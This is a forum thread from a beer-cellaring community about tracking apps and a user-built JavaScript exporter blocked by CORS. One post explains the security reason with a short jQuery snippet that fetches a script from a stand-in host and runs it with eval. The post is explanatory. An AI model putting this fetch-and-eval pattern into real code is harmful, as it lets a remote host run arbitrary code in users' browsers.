cellarhq vs beercellar.me

Discussion in 'Cellaring Beer' started by kzeon, Jun 17, 2015.

1. kzeon

kzeon

I've been on cellarhq for a long time, and I'm not sure if it's me, if it's them, the big update that occured a few months ago, or if it's related to the size of my cellar, but it's getting super slow and sluggish to add stuff on it. To the point where I'm pretty fed up with it. beercellar.me seems very nice, easier to play with quantity and clearer, but before adding 225 unique beers to beercellar.me, I'd like to get the confirmation that it's worth it and that I'm not going to do all this work to then realize it has major pitfalls too...

Any cue? Another solution I'm not aware of that is better than those two?

skank you!

2. LukeAleTime

LukeAleTime

dbannister and Juan Gueuzeman like this.
  3. kzeon

kzeon

Thanks, looking clean. I really like the fact that mybeercellar links to BA directly, at least I don't have to google stuff out.

Will give a shot to your template!

4. BusinessSloth

BusinessSloth

Not just you. cellarHQ has been glitchy and terrible ever since that update. I was always miffed at the system in place for adding beers as well. Many duplicate or flat out incorrect entries for breweries/beers

Last edited: Jun 17, 2015
  5. LukeAleTime

LukeAleTime

I like a clean spreadsheet. No clutter, no stress. It should total up at the bottom as well. I'm thinking about adding a column in for vintages (like a 2014 bottling of a 2010 beer or whatever)

6. tinypyramids

tinypyramids

google doc supremacy. incredibly easy to enter data and access it both from my laptop and phone. it's also easy as hell to export data or to make graphs or whatever. i'm trying to drink down my cellar and i have a graph set up of number of bottles over time. it's cool to watch it go down.

not to mention that google services are going to be way more reliable than pretty much anything else.

Holland, LukeAleTime and gregkoko like this.
  7. Juan Gueuzeman

Juan Gueuzeman

excel ss, then share on google docs. by far the best way.

8. thefleshlight

thefleshlight

I know this thread is a little old but there used to be a way to export data from cellarhq to excel. Anyone know how to do that? I too am getting annoyed with their layout and slooowwww site.

9. jivex5k

jivex5k

Did a search and found this:
    I'm bored at work, I'll see if I can write something in javascript to do it automatically.

hamburger and thefleshlight like this.
  10. thefleshlight

thefleshlight

well shiiiiittttt, if I don't have to do any work, that would be even better!

11. jivex5k

jivex5k

OK, I made one. It's not perfect yet but it seems to be working. I hosted the code here:

If you click the download link and open the downloaded html file in internet explorer it works. You need IE 10 or higher though, it has HTML5.

Doesn't work on my chrome browser, but mine is set up all kinds of weird so it may work on your chrome. Haven't tested it with firefox.

It saves it as a CSV file which can be loaded via any spreadsheet program. There's a weird issue with the formatting of apostrophes but I'll figure it out tomorrow.

Hell maybe I can spruce it all up and package it nicely with cool memes and marquee text, but the baseline is working here.

Basically you paste your cellarhq address and hit save file.

duceswild and Lurkaholic like this.
  12. tennispl

tennispl

Sounds like too much work

13. jivex5k

jivex5k

So pastebin is making it weird.
    Best bet is to download it here: http://www.mediafire.com/view/7oc7x35zxilikza/cellarhqtocsv.html
    Open in Internet Explorer, paste in cellarhq and hit save.

If someone here is running a webserver they could just host the html, it uses two external libraries that are already hosted, JQuery (for ajax) and FileSaver.js to utilize HTML5 to save a file.

14. kzeon

kzeon

it's a little tricky, given that the polled data is on a different server and most of the browsers will forbid the retrieval (XSS).

Will try to take a few minutes tomorrow to fix this if somebody doesn't do it before me.

jivex5k likes this.
  15. jivex5k

jivex5k

So I've been reading up on CORS and stuff, and I hosted the file on a local webserver to eliminate any possible issues from accessing a local file instead of an http address but it's still not working.

Apparently cellarHQ has to put this in their response headers for this method to work: Access-Control-Allow-Origin: *
    Which would allow all domains to access their stuff it seems.

Yeah even in IE I get the error: Origin http://192.168.101.121 not found in Access-Control-Allow-Origin header.

What's weird is it will work if I open the html file locally in IE... Anyway a lot of information on CORS seems to assume I control both servers, going to see what else I can find about this.

16. FalconA

FalconA

Yep, the javascript go-retrieve-it approach is not going to work unless you get cellarhq's owner to make the site accessible to cross-origin requests.

Barring them enabling that for you, options are to minify the code into something that can be run when on a cellar page (i.e. paste: "javascript: alert('hello');" ) into the URL bar so that it runs from within the page you are on (which can also be confusing because most browsers will remove the 'javascript:' from the pasted text as a security measure). Or, to run a server that will proxy the GET requests for you

17. jivex5k

jivex5k

Seems weird, I mean it's just a GET request right? Why would the server treat it differently than if you just went to that address in your browser? And why does it work in IE when it's a local file?

Weird shit... yeah running the code in the console or url bar seems less than ideal. Maybe I'll just write a C# program or something, it just seems this would be a common task to do in a browser. I mean it's just parsing the html table.

18. kzeon

kzeon

Thing is, the GET request could pull malicious JS then executed in the callback. If somebody find a way to insert JS, they can easily do anything after. Might seems hard to make it happen, but it isn't. If somebody gets able to slip in some unclean stuff on your page, you get the following easy attack:

Code:
    $.get('http://evilwebsite.com/js/malicious.js', function(data) {
       eval(data); // you're fucked
    });

Anyway, got something in like 5 minutes for you. It's nasty as hell, a few manual steps, but whatever:

https://jsfiddle.net/vhdn26xa/1/

Another easy way to do it, to bypass the CORS limiation would be to have a server-sided script that does a cURL to the cellar, grab the HTML, returns it to the JS and tada. But my previous cheapo solution works well too and I'm just lazy hah

tennispl likes this.
  19. tennispl

tennispl

Holy. Fucking. Shit. evilwebsite.com is real site, and I just lost my shit.

thefleshlight, jivex5k and kzeon like this.
  20. jivex5k

jivex5k

Yeah, not looking to host a server for this lol. So .get isn't going to work for this, except if you open and re-save the html and use IE....why the hell does it work then?

I wonder if I could make a chrome extension that would do it... It just seems stupid to me that I can't make an html site just view the standard get response, I mean it's up to me what I do with that data right? IDK... there's a lot about security I don't understand but in your example of the eval it would only be harmful if I was running an eval on that shit right?

Because if someone injected malicious code into my .get the worst that could happen is the regex fails to match right? I mean I'm not putting an eval in there, I don't think I've ever used eval once.

Anyway, I'm going to look into making an extension for this I guess, idk.... a .net application would probably the the most portable. I don't do a lot of .net work though, hell I don't even have Visual Studio on this PC, I only write in C for an embedded platform we are working with.